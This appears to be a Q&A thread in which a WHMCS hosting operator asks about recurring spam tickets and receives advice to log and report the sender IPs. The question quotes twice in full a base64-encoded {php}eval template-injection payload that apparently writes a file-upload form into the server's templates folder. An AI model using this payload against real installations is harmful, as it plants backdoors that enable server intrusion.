# Should WHMCS hacking attemps that never succeed be important to me?

Tags: php, server, security, hacking

I have WHMCS and I use it with no problem for my hosting purposes.

Almost every 2 or 3 days, I can see a spam with malicious content submitted as a new ticket that tries to hack.

The last one was:

Subject:

```
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})
```

Message:

```
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})
```

What are these attacks? Why don't they use any other way to attack?!!!

In my opinion it is obvious that a system like WHMCS will never be hacked by such a poor attempts. They should have of course used some functions like `strip_tags` and `mysql_real_escape_string` and other security functions.

Would any body explain why do they always select such a poor way to attack? Don't they really know that WHMCS is stronger than these low level hacks?

In fact I'd like to know that: Do these efforts differ from each other? Can they be serious? Should I be scared of these attempts?

Answer (score 3, accepted):

It's a robot scanning the web for WHMCS installs that are vulnerable to this attack, it's just part and parcel of running a website.

Comment: Thank you for your comment. But I have enabled captcha. How can they pass that?!

Comment: So as you believe there is no worry at all? Right?

Comment: Most capcha's have been broken many times over by now, all capcha does is weed out the serious attackers from the non-serious one's so long as you keep catching the mails it should be fine - have you tracked the ip down in your logs?.

Comment: Thank you for your suggestion. I always `Block Sender And Delete` that ticket.

Answer (score 4):

In case you're curious, here's the source (or a copy of it) to the attacker's method: http://pastebin.com/yCW9vWzZ This may help also: http://www.wjunction.com/10-hosting-discussion/116021-boxslots-hacked-again-5.htm

As for being worried? If you are sure you follow the orthodox server security protocols, and you actively check for and fix any holes, then you should be fine. I recommend you keep a log of all of the IP addresses sending this code, and then maybe call their ISP (can be determined from http://ip2location.com/their.ip.address.here).